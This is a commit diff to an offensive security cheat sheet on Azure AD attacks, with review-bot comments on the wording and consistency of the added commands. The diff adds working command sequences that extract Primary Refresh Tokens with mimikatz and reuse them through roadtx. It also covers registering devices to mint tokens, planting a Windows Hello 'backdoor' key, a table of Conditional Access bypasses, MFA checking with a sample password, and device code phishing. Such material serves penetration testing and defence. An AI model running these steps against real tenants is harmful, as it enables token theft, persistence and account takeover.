AAD PRT + Conditional Access Policy

pull/1/head
Swissky 2023-11-20 23:20:18 +01:00
parent 24fe926630
commit 23b16ca0de
5 changed files with 58 additions and 7 deletions

Binary file not shown.

@ -95,6 +95,16 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
```
### Extract PRT v1
```ps1
mimikatz # sekurlsa::cloudap
mimikatz # sekurlsa::dpapi
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url https://portal.azure.com
```
### Extract PRT on Device with TPM
* No method known to date.
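Review bot: In the `Extract PRT v1` block, nothing says which command's output supplies `<key-value>`, `<prt>` and `<clear-key>`, so the four lines cannot be followed without already knowing the tooling. A one-line comment above each step naming the value it yields would fix that. The heading should also say what "v1" covers: the next section's "No method known to date" for devices with a TPM implies this procedure applies only where the keys are not TPM-protected, and stating that precondition tells a defender which devices are exposed.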
@ -103,11 +113,17 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
### Generate a PRT by registering a device
```ps1
roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
roadtx device -n devicename
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem
roadtx prtenrich prt roadtx.prt
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem -r 0.AVAApQL<snip>
# Get correct token audience
roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file
# Registering device
roadtx device -a register -n <device-name>
# Request PRT
roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key
# Use a PRT
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
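Review bot: In the `Generate a PRT by registering a device` block, the `roadtx gettokens` line passes `--refresh-token file` while the `roadtx prt` line under `# Request PRT` passes `--refresh-token <refresh-token>`, and nothing says whether `file` is a literal keyword or a path the reader must substitute. Extend the `# Get correct token audience` comment to say which it is and where the token comes from. The visible lines also spell the same inputs two ways (`-key-pem`/`-cert-pem` against `-k`/`-c`, `devicename` against `<device-name>`); if both variants remain after this change, settle on one. The client id `29d9ed98-a469-4536-ade2-f981bc1d605e` is given without naming the application it belongs to, which a short comment would cover.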

@ -25,7 +25,24 @@
### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
### Register Devices
```ps1
roadtx device -a register -n swkdeviceup
```
### Windows Hello for Business
```ps1
roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
# Service Principals
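Review bot: The `Windows Hello for Business` block invokes the tool as `roadtx.exe` on its first three lines and as `roadtx` on the fourth, while `Register Devices` just above uses `roadtx`; use one form throughout. The steps carry no comments, so the reader has to guess that `swkdeviceup.pem` and `swkdeviceup.key` come from the `roadtx device -a register -n swkdeviceup` command and whether `winhello -k swkdevicebackdoor.key` creates that key file or expects it to exist. Replacing the author-specific names with placeholders such as `<device-name>`, as the PRT page does, and adding one comment per step would make the sequence self-explanatory.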

@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Conditionnal Access Policy
## Azure AD - Conditional Access Policy
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
Conditional Access is used to restrict access to resources to compliant devices only.
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
| CAP | Bypass |
|---------------------------|---------|
| Location / IP ranges | Corporate VPN, Guest Wifi |
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
| Azure AD Joined Device | Try to join a VM (Work Access)|
| Device requirement | / |
| MFA | / |
| Legacy Protocols | / |
| Compliant Device (Intune) | / |
| Domain Joined | / |
## Azure AD - MFA
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
```ps1
Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
```
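Review bot: In the CAP table, five rows (`Device requirement`, `MFA`, `Legacy Protocols`, `Compliant Device (Intune)`, `Domain Joined`) have `/` in the Bypass column with no legend, so it is unclear whether that means "none known" or "not yet documented"; add a line under the table saying which. The new intro sentence, "restrict access to resources to compliant devices only", is narrower than the table, which also lists location, platform, protocol and MFA conditions, so it should be widened to match. Two typos in the `Protocol requirement` row: `acccess` and `e.g` without the closing period.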

@ -83,6 +83,11 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
## Device Code Phishing
* Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
```ps1
roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource https://graph.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
```
* Using TokenTactics to request a token for Azure Graph API using a device code
```ps1
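Review bot: The `ps1` block added under `Device Code Phishing` mixes the typed command with two lines of its output (`Requesting token for resource ...` and `To sign in, use a web browser ...`) without marking them as output, so they read as further commands. Prefix them as comments or move them to a separate untagged block. The bullet above the block shows `roadtx gettokens -u user@domain.lab --device-code` while the block runs `roadtx.exe auth --device-code -c ...`; either align the two or say why both subcommands are listed, and name the tool consistently rather than "roadtool".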